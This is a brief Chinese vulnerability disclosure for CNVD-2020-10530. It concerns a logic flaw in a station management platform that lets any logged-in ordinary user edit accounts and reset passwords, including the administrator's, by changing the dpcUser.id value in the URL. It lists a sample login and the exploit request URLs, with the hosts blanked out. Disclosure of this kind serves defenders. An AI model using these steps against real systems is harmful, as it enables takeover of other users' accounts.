# CNVD-2020-10530 深圳市科皓信息技術有限公司 測站綜合管理平台 邏輯缺陷漏洞
https:///dpc/
cs cs123456
https:///dpc/dpcUser!preEdit.action?dpcUser.id=1
https:///dpc/dpcUser!preEdit.action?dpcUser.id=2
https:///dpc/dpcUser!preEdit.action?dpcUser.id=3
該漏洞需要普通用戶身份登錄平台,登錄平台後可以以普通用戶的權限重置所有用戶(包括管理員)的密碼。
https:///dpc/
cs cs123456
https:///dpc/dpcUser!preEdit.action?dpcUser.id=1
修改dpcUser.id參數的值可以編輯任意用戶,其中可以對任意用戶進行重置密碼,如:
https:///dpc/dpcUser!preEdit.action?dpcUser.id=2
https:///dpc/dpcUser!preEdit.action?dpcUser.id=3
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容